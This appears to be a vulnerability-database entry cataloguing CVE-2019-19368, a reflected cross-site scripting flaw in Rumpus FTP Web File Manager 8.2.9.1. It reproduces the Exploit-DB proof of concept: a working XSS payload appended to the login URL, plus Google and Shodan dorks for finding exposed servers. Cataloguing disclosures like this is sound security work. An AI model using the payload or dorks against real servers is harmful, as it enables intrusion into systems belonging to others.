ID

VAR-E-201912-0079


CVE

cve_id:CVE-2019-19368

Trust: 1.5

sources: PACKETSTORM: 155719 // EXPLOIT-DB: 47789

EDB ID

47789


TITLE

Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting - ASP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 47789

DESCRIPTION

Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting. CVE-2019-19368 . webapps exploit for ASP platform

Trust: 0.6

sources: EXPLOIT-DB: 47789

AFFECTED PRODUCTS

vendor:rumpusmodel:ftp web file managerscope:eqversion:8.2.9.1

Trust: 2.1

sources: PACKETSTORM: 155719 // EXPLOIT-DB: 47789 // EDBNET: 102361

EXPLOIT

# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368

Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.

PoC:

Payload: ?!'><sVg/OnLoAD=alert`1`//

Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//

Solution:
Update to the latest version released by vendor.

Trust: 1.0

sources: EXPLOIT-DB: 47789

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 47789

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 47789

TYPE

Reflected Cross-Site Scripting

Trust: 1.6

sources: EXPLOIT-DB: 47789 // EDBNET: 102361

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:xss

Trust: 0.5

sources: PACKETSTORM: 155719

CREDITS

Harshit Shukla

Trust: 0.6

sources: EXPLOIT-DB: 47789

EXTERNAL IDS

db:EXPLOIT-DBid:47789

Trust: 1.6

db:NVDid:CVE-2019-19368

Trust: 1.5

db:EDBNETid:102361

Trust: 0.6

db:PACKETSTORMid:155719

Trust: 0.5

sources: PACKETSTORM: 155719 // EXPLOIT-DB: 47789 // EDBNET: 102361

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-19368

Trust: 1.5

url:https://www.exploit-db.com/exploits/47789/

Trust: 0.6

sources: PACKETSTORM: 155719 // EXPLOIT-DB: 47789 // EDBNET: 102361

SOURCES

db:PACKETSTORMid:155719
db:EXPLOIT-DBid:47789
db:EDBNETid:102361

LAST UPDATE DATE

2022-07-27T09:11:11.697000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:155719date:2019-12-18T14:02:17
db:EXPLOIT-DBid:47789date:2019-12-18T00:00:00
db:EDBNETid:102361date:2019-12-18T00:00:00